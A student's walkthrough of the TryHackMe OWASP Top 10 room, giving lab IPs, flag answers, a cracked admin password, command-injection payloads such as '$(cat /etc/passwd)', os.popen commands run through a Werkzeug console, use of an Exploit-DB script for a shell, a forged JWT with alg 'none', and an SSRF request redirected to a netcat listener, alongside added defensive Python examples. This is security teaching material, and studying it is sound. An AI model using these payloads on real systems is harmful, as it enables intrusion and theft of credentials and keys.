NAME: JUSTUS KOECH_CS-SA07-24044
ASSIGNMENT: OWASP TOP 10
Overview
The OWASP Top 10 vulnerabilities represent critical security risks to web applications. Injection
flaws, such as SQL injection, occur when untrusted data is sent to an interpreter, and can be
prevented with parameterized queries and input validation. Broken authentication involves flaws
in session management or credential handling that allow impersonation, mitigated by
multi-factor authentication and secure password storage. Sensitive data exposure happens due to
inadequate protection of information and can be addressed by encrypting data and enforcing
access controls.
Security misconfigurations arise from incorrect or default settings, mitigated by regularly
updating software and performing security reviews. Cross-Site Scripting (XSS) involves the
injection of malicious scripts into web pages and can be prevented with input validation, output
encoding, and Content Security Policy (CSP). Insecure deserialization exploits untrusted data to
manipulate application logic or execute code, which can be mitigated by using serialization
frameworks with integrity checks.
This room focuses on the following OWASP Top 10 vulnerabilities:
1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entity
5. Broken Access Control
6. Security Misconfiguration
7. Cross-site Scripting
8. Insecure Deserialisation
9. Components with Known Vulnerabilities
10. Insufficient Logging & Monitoring
Task 4 [ Broken Access Control (IDOR Challenge) ]
Read and understand how IDOR works.
No Answer Needed
Deploy the machine and go to 10.10.67.17. Log in with the username noot and the password
test1234.
No Answer Needed
Look at other users’ notes. What is the flag?
Hint: The URL contains ?note_id=1 — I wonder what happens if you change the parameter
value? You might be able to access another user’s notes.
Answer: flag{fivefourthree}
First, start up the machine. Once it has booted, open Firefox and head to
http://10.10.57.180:81/. Once there, go to the login page and view the source code. You can view
the source code with the hotkey combo CTRL + U, which opens it in a separate page.
Have a look around the web app. The developer has left themselves a note indicating that there is
sensitive data in a specific directory.
What is the name of the mentioned directory?
Hint: Have a look at the source code on the /login page.
Answer: /assets
Navigate to the directory you found in question one. What file stands out as being likely to
contain sensitive data?
Answer: webapp.db
Use the supporting material to access the sensitive data. What is the password hash of the admin
user?
Download the database (.db) file and pull up your command line. List everything in the folder
using ls -l.
Next, open the database with SQLite3 using sqlite3 webapp.db, then run .tables, which shows
the “users” table, and finally PRAGMA table_info(users).
Answer: 6eea9b7ef19179a06954edd0f6c05ceb
Crack the hash.
What is the admin’s plaintext password?
Hint: Read the supporting material.
The supporting material suggests we go to CrackStation. Once at the CrackStation site, copy and
paste the password hash, confirm that you are not a robot, and select the “Crack Hashes” button.
Copy and paste the result.
Answer: qwertyuiop
Log in as the admin. What is the flag?
The username is admin; then copy and paste the password.
Answer: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}
Task 9 [ 3. Injection ]
I’ve understood Injection attacks.
No Answer Needed
Task 10 [ 3.1. Command Injection ]
In this module, we are going to inject Linux commands into the cowsay web application. TryHackMe
was kind enough to give us a few basic commands:
● whoami
● id
● ifconfig/ip addr
● uname -a
● ps -ef
But we will also be using a few others such as:
● $(ls)
● $(ls -la)
● $(cat /etc/passwd)
● $(cat /etc/os-release)
Now, let's get started. Head to the link given https://10.10.249.73
This was my approach; you can do things your way. I started with the command: $(whoami)
This is actually the answer to the third question: apache
Next, I used the command $(ls) to find any files in the root directory.
The results are [css drpepper.txt index.php js]. This leads us to the answer to the first question.
After that, it is time to find out the answer to the next question:
How many non-root/non-service/non-daemon users are there?
How do we determine that? We use the command $(cat /etc/passwd) to list the users. Broken down,
the command is [cat] (concatenate and print) applied to the file [/etc/passwd].
It is a long list
What is the trend here?
There are no non-root/non-service/non-daemon users (standard users).
You can also use the command [awk] with a few parameters:
$(awk -F: '$3 >= 1000' /etc/passwd)
Without going in-depth into the command, there are no standard users listed, making the answer
“0”. The hint here is sbin, which is short for system binary. sbin is meant for system
administrators and should not be accessible to standard users, so seeing /sbin/nologin is an
indicator.
Going back to the question about the user name [apache] we can scroll to the bottom and find the
user’s [apache] shell [/sbin/nologin].
It is time to finish this task by using a command to find the operating system version. The
command I used was [$(cat /etc/os-release)]; the result was straightforward: 3.16.0. You can also
use [$(cat /etc/alpine-release)], as the hint suggests.
What strange text file is in the website’s root directory?
Answer: drpepper.txt
How many non-root/non-service/non-daemon users are there?
Answer: 0
What is the name of the user?
Answer: apache
What is the user’s shell set as?
Answer: /sbin/nologin
What version of Alpine Linux is running?
Hint: The version can be found in “/etc/alpine-release”.
Answer: 3.16.0
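As an added example (not code from the room or from TryHackMe), here is a stand-in for the vulnerable cowsay handler beside a hardened version: echo and printf stand in for the cowsay binary so it runs on any POSIX system, and the function names are made up for this illustration.

```python
import re
import subprocess


# Stand-in for the vulnerable cowsay page: the user's text is spliced into a
# shell command string, so the shell expands $(...), backticks, ; and | before
# the program ever sees the text. "echo" replaces the cowsay binary here.
def cowsay_vulnerable(message: str) -> str:
    result = subprocess.run(f"echo {message}", shell=True,
                            capture_output=True, text=True)
    return result.stdout.rstrip("\n")


# Hardened form: an argv list and no shell, so the text reaches the program as
# one literal argument and nothing is expanded. printf '%s' stands in for cowsay.
def cowsay_hardened(message: str) -> str:
    result = subprocess.run(["printf", "%s", message],
                            capture_output=True, text=True)
    return result.stdout.rstrip("\n")


# Shell metacharacters a cowsay message never legitimately needs; the same
# pattern works as a request-log or WAF rule for spotting injection attempts.
SHELL_META = re.compile(r"[;&|`$<>\\]")


def looks_like_injection(message: str) -> bool:
    return SHELL_META.search(message) is not None


def cowsay_endpoint(message: str) -> str:
    """Defence in depth: reject suspicious input, and never go through a shell."""
    if looks_like_injection(message):
        return "rejected: message contains shell metacharacters"
    return cowsay_hardened(message)


if __name__ == "__main__":
    print(cowsay_vulnerable("$(echo pwned)"))   # the shell ran the inner command
    print(cowsay_hardened("$(echo pwned)"))     # printed literally, nothing ran
    print(cowsay_endpoint("$(whoami)"))         # rejected before execution
```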
Task 11 [ 4. Insecure Design ]
Navigate to http://MACHINE_IP:85 and get into joseph’s account. This application also has a
design flaw in its password reset mechanism. Can you figure out the weakness in the proposed
design and how to abuse it?
Time to once again boot up the VM, open Firefox, and make your way to http://10.10.128:85.
Once you get to the page you should notice that it is a login page. We want to use the information
that we have so far. THM told us that the person’s name is “joseph”, but we don’t have a
password and we are not sure if that is his username. But there is a button that says “I forgot my
password…”. Click it and continue on.
Password reset page
It will first ask for the username; “joseph” was supplied, so we are using that. Now, the question’s
hint asks which of the three options is the easiest to guess. The first is an impossible task
within the scope of this task, and so is the last one. So we are going to be guessing colors.
ROYGBIV (Red, Orange, Yellow, Green, Blue, Indigo, and Violet) is a safe place to start. I tried
starting with the spelling variations of Red and finally landed on “green” (it is case-sensitive). The
system automatically generates a new temporary password. You should write it down and/or copy
and paste it. Use it to log in.
And we are in.
Explore the options and make your way to private.
Open Flag.txt to get the flag and to finish the task.
Answer: THM{Not_3ven_c4tz_c0uld_sav3_U!}
Task 12 [5. Security Misconfiguration]
Time to boot up the machine again and head to the given website in Firefox.
Once you get there, input the following code:
import os; print(os.popen("ls -l").read())
Once we run the code it returns the directory listing. The first question asks for the file
name of the database. The easiest way to find the answer is to look for the file name
ending in [.db].
The next question asks you to modify the code, so you can read the contents of the app.py. It
should look like this:
import os; print(os.popen("cat app.py").read())
Once we enter the altered code the site returns the flag:
THM{Just_a_tiny_misconfiguration}
Navigate to http://MACHINE_IP:86/console to access the Werkzeug console.
No Answer Needed
Use the Werkzeug console to run the following Python code to execute the ls -l command on the
server:
import os; print(os.popen("ls -l").read())
What is the database file name (the one with the .db extension) in the current directory?
Answer: todo.db
Modify the code to read the contents of the app.py file, which contains the application's source
code. What is the value of the secret_flag variable in the source code?
Answer: THM{Just_a_tiny_misconfiguration}
Task 15 [ Vulnerable and Outdated Components — Lab ]
This task is about exploiting outdated components. Open Firefox then head to the given site.
Looking at the site we learn that this is a bookstore app. Go to the Exploit Database site and
search for the keyword “bookstore”.
Download the exploit [47887.py] and use the command python3 47887.py [insert URL], then type
“y” to launch the shell. Use the command [cat /opt/flag.txt] to reveal the flag. The key here is
that you already know which file you are looking for, /opt/flag.txt, and that to open it we use the
command [cat].
What is the content of the /opt/flag.txt file?
Hint: You know it’s a bookstore application. You should check for recent unauthenticated
bookstore apps RCEs.
Answer: THM{But_1ts_n0t_myf4ult!}
Task 16 [ 7. Identification and Authentication Failures]
I’ve understood broken authentication mechanisms.
No Answer Needed
Task 17 [ Identification and Authentication Failures Practical ]
Start up the machine and open Firefox. Then go to the given website.
Register with the username “darren”, as the instructions say, and a message will be returned:
“Error: This user is already registered”.
Now, let’s use the same method to access the username “arthur”.
What is the flag that you found in darren’s account?
Answer: fe86079416a21a3c99937fea8874b667
Now try to do the same trick and see if you can log in as arthur.
What is the flag that you found in arthur’s account?
Answer: d9ac0f7db4fda460ac3edeb75d75e16e
Task 19 [Software Integrity Failures Security misconfiguration]
This is a fairly simple and straightforward task. You can use the attack box or your own browser
for this task. Open a new page and go to https://www.srihash.org/.
Input the given URL [https://code.jquery.com/jquery-1.12.4.min.js] and ensure that you’re using
SHA-256.
What is the SHA-256 hash of https://code.jquery.com/jquery-1.12.4.min.js
Hint: Remember you can use https://www.srihash.org/ to calculate integrity hashes for SRI.
Answer: sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=
Task 20 [Data Integrity Failures]
Start your machine and attack box, then go to the site that was given, http://10.10.95.95:8089/.
Once you get to the screen, attempt to log into the guest account with a random password.
You will receive a message telling you how to log in.
Once you log in it gives you another message.
Okay, challenge accepted.
Inspect the page source
Once you open the Dev Tools, go to the Storage tab.
Open a word document. Copy the “Value” and paste the entire token into the document. It should
look like this:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNjg2MzIxNjI2fQ.L159cLhW34u6BYodwGSJwHftLw34J-zKQF9Xo1uYBVA
Next, you need the header and payload. If you recall from the task, the header is everything up to
the first “.”, and the payload is everything up to the next “.”; don’t worry about the signature, we
won’t need it.
Go to https://appdevtools.com/base64-encoder-decoder and DECODE the header and payload
separately.
Copy and paste the decoded information, change “HS256” to “none” in the header, then
change “guest” to “admin”. Now it’s time to encode this information. Take the two encoded
results and combine them. It should look like this:
Copy and paste the pair into the value of the cookie.
Once you insert the code into the cookie, refresh the page to get the flag.
Try logging into the application as guest. What is guest’s account password?
Hint: Try logging in with the wrong credentials.
Answer: guest
If your login was successful, you should now have a JWT stored as a cookie in your browser.
Press F12 to bring out the Developer Tools.
Depending on your browser (Firefox or Chrome), the Developer Tools tab from which you can edit
cookies differs.
What is the name of the website’s cookie containing a JWT token?
Answer: jwt-session
Use the knowledge gained in this task to modify the JWT token so that the application thinks you
are the user “admin”.
No Answer Needed
What is the flag presented to the admin user?
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0g=.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzE5NDM5NTExfQo==.
Answer: THM{Dont_take_cookies_from_strangers}
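The manipulation above only works because the server trusts the alg field in the token's own header. As an added example (not the room's code), a minimal HS256 verifier that pins the algorithm server-side, checks the signature and expiry, and therefore rejects the modified token; the key and claims are constructed for this illustration.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    # JWT segments are unpadded; restore the padding before decoding
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_jwt(claims: dict, key: bytes) -> str:
    """Issue an HS256 token the way the room's application would."""
    header = b64url_encode(json.dumps({"typ": "JWT", "alg": "HS256"},
                                      separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def verify_jwt(token: str, key: bytes, now: int) -> dict:
    """Return the claims if the token is valid, otherwise raise ValueError."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, body_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    # The server decides the algorithm; the token's header never does, so
    # "none" (and any other algorithm) is rejected before the signature is read.
    if header.get("alg") != "HS256":
        raise ValueError(f"algorithm {header.get('alg')!r} not allowed")
    expected = hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("signature mismatch")
    claims = json.loads(b64url_decode(body_b64))
    if int(claims.get("exp", 0)) <= now:
        raise ValueError("token expired")
    return claims


def token_status(token: str, key: bytes, now: int) -> str:
    """Convenience wrapper: 'ok' or the reason the token was rejected."""
    try:
        verify_jwt(token, key, now)
        return "ok"
    except ValueError as exc:   # covers JSON and base64 decoding errors too
        return str(exc)
```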
Task 21 [9. Security Logging and Monitoring Failures]
This is a fairly simple task. Download the log file and look at the data.
Notice the IP address that recurs within a span of 15 seconds? That is the attacker, and the IP
address is the answer to the first question. The next thing to notice is the different attempts: same
IP address, different login names, within 15 seconds. This is the key to question two. It is a “Brute
Force” attack.
Fortinet’s definition.
What IP address is the attacker using?
Hint: Check for common actions in a short sequence of time.
Answer: 49.99.13.16
What kind of attack is being carried out?
Hint: What do you call trying combinations of usernames and passwords to gain access to users’
accounts?
Answer: Brute Force
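As an added example (not the room's log file, which is not reproduced here), the pattern described above, one IP cycling through usernames within 15 seconds, written as detection logic over a constructed sample log with made-up addresses:

```python
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample auth log: ISO timestamp, source IP, event, user.
# 203.0.113.5 tries a different username every second or two; 198.51.100.7 is
# an ordinary user who mistypes a password once and then logs in.
SAMPLE_LOG = """\
2024-06-01T10:00:00 203.0.113.5 LOGIN_FAILED user=admin
2024-06-01T10:00:01 203.0.113.5 LOGIN_FAILED user=root
2024-06-01T10:00:02 203.0.113.5 LOGIN_FAILED user=guest
2024-06-01T10:00:03 198.51.100.7 LOGIN_FAILED user=bob
2024-06-01T10:00:04 203.0.113.5 LOGIN_FAILED user=test
2024-06-01T10:00:05 203.0.113.5 LOGIN_FAILED user=user
2024-06-01T10:00:07 203.0.113.5 LOGIN_FAILED user=info
2024-06-01T10:00:12 198.51.100.7 LOGIN_OK user=bob
2024-06-01T10:00:13 203.0.113.5 LOGIN_FAILED user=support
2024-06-01T10:00:14 203.0.113.5 LOGIN_FAILED user=jsmith
2024-06-01T10:01:30 198.51.100.7 LOGIN_FAILED user=bob
""".splitlines()


def detect_bruteforce(lines, window_seconds=15, min_distinct_users=5):
    """Return {ip: most distinct usernames tried within one window} for every
    source IP whose failed logins cover at least min_distinct_users names."""
    recent = defaultdict(deque)   # ip -> (timestamp, user) pairs inside the window
    alerts = {}
    for line in lines:
        ts_text, ip, event, user_kv = line.split()
        if event != "LOGIN_FAILED":
            continue
        ts = datetime.fromisoformat(ts_text)
        user = user_kv.split("=", 1)[1]
        window = recent[ip]
        window.append((ts, user))
        # drop attempts that fell out of the sliding window
        while (ts - window[0][0]).total_seconds() > window_seconds:
            window.popleft()
        distinct = {u for _, u in window}
        if len(distinct) >= min_distinct_users:
            alerts[ip] = max(alerts.get(ip, 0), len(distinct))
    return alerts


if __name__ == "__main__":
    for ip, count in detect_bruteforce(SAMPLE_LOG).items():
        print(f"possible brute force from {ip}: {count} usernames in 15s")
```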
Task 22 [10. Server-Side Request Forgery (SSRF)]
Start the machine and the attack box, then open Firefox. Head to the given site,
http://10.10.222.189:8087/
The first question asks for the host that is allowed in the Admin Area. To find this answer we
need to navigate to that page. Look for the three bars in the upper right and click on them, then
attempt to open the Admin Area.
Once you attempt it, you will be given a message that you were denied access because you are not
“localhost”. This is the answer to the first question.
The next question asks for the server parameter for the resume download. Go back to the home
page and hover your pointer over the button at the bottom.
Either way, you will notice server=. “secure-file-storage.com” is the answer that we are
looking for.
The next question asks us to intercept the request via SSRF.
We are going to use the link, which should be similar to this:
http://10.10.182.198:8087/download?server=secure-file-storage.com:8087&id=75482342
The next step is to remove the secure-file-storage.com:8087 value and replace it with the IP of
your attack box.
Open your terminal and use the command (this is for netcat listener):
nc -lvnp 8087
Once the netcat listener is open, use the altered link. Keep an eye on the terminal to get the flag.
We are going to work on the server’s link to get into the Admin Area.
http://10.10.222.189:8087/download?server=secure-file-storage.com:8087&id=75482342
We already know from the first question that only “localhost” has access to the area. So we are
going to change the server to the localhost and admin by using
“server=http://localhost:8087/admin#&id=75482342”.
I figured out that you can use a method similar to SQL injection to break up the server and id in
the link (obfuscation). Some forums called it “escaping the # (hash)”. To break up the server and
id we URL-encode the #, changing it to %23. It should look like this:
server=http://localhost:8087/admin%23&id=75482342
Take this and insert it into the URL to get this:
http://10.10.222.189:8087/download?server=http://localhost:8087/admin%23&id=75482342
You should get the flag and feel a sense of accomplishment, because you completed an optional
task that required research and persistence.
_________________________________________________________
Explore the website. What is the only host allowed to access the admin area?
Hint: Try to access the admin area. Can you find any useful info in the error messages?
Answer: localhost
Check the “Download Resume” button. Where does the server parameter point to?
Answer: secure-file-storage.com
Using SSRF, make the application send the request to your AttackBox instead of the secure file
storage. Are there any API keys in the intercepted request?
Answer: THM{Hello_Im_just_an_API_key}
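Both tricks above come down to one weakness: the server parameter is passed straight through to the outbound request. As an added example (not the application's code), a validator for that parameter that allowlists the storage host, URL-decodes before checking so %23 cannot smuggle a fragment, and refuses anything URL-shaped such as http://localhost:8087/admin%23; the host, port and function names are assumptions taken from the task.

```python
from urllib.parse import unquote

# Assumed for this example: the only legitimate upstream is the file-storage
# host named in the task, on the port the application already uses.
ALLOWED_HOSTS = {"secure-file-storage.com"}
EXPECTED_PORT = 8087


def validate_server(server: str):
    """Accept only host[:port] naming an allowlisted host; raise ValueError otherwise."""
    # Check the value the app will actually use, i.e. the URL-decoded form,
    # so that %23 (#), %2F (/) and similar cannot hide a path or fragment.
    value = unquote(server).strip().lower()
    if "://" in value or any(ch in value for ch in "/#?@\\ "):
        raise ValueError("server must be host[:port], not a URL")
    host, _, port_text = value.partition(":")
    port = int(port_text) if port_text else EXPECTED_PORT   # non-numeric -> ValueError
    if port != EXPECTED_PORT:
        raise ValueError(f"port {port} not allowed")
    if host not in ALLOWED_HOSTS:
        # rejects the attack box IP, localhost, 127.0.0.1 and any other host
        raise ValueError(f"host {host!r} not in allowlist")
    return host, port


def build_download_url(server: str, file_id: str) -> str:
    """The URL the resume download would fetch, built only from validated parts."""
    host, port = validate_server(server)
    if not file_id.isdigit():
        raise ValueError("id must be numeric")
    return f"http://{host}:{port}/download?id={file_id}"


def download_status(server: str, file_id: str = "75482342") -> str:
    """Convenience wrapper: the outbound URL, or 'rejected: <reason>'."""
    try:
        return build_download_url(server, file_id)
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    for candidate in ("secure-file-storage.com:8087", "10.10.10.10:8087",
                      "http://localhost:8087/admin%23", "localhost:8087"):
        print(f"{candidate:35} -> {download_status(candidate)}")
```

When the allowlist holds hostnames rather than fixed IPs, a stricter variant also resolves the name at request time and refuses loopback or private addresses, so a DNS record cannot redirect the fetch internally.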
Conclusion:
The OWASP Top 10 for 2021 highlights the evolving landscape of web application security
risks. It underscores the need for developers and security professionals to focus not only on
traditional vulnerabilities like injection and authentication flaws but also on emerging threats
such as insecure design and software integrity issues. By adhering to these guidelines,
organizations can significantly enhance their security posture and protect their applications
against a broad range of attacks. As web technologies and threats evolve, continuous education
and adaptation of security practices remain essential for mitigating risks effectively.
Shareable link: https://tryhackme.com/p/justuskoech96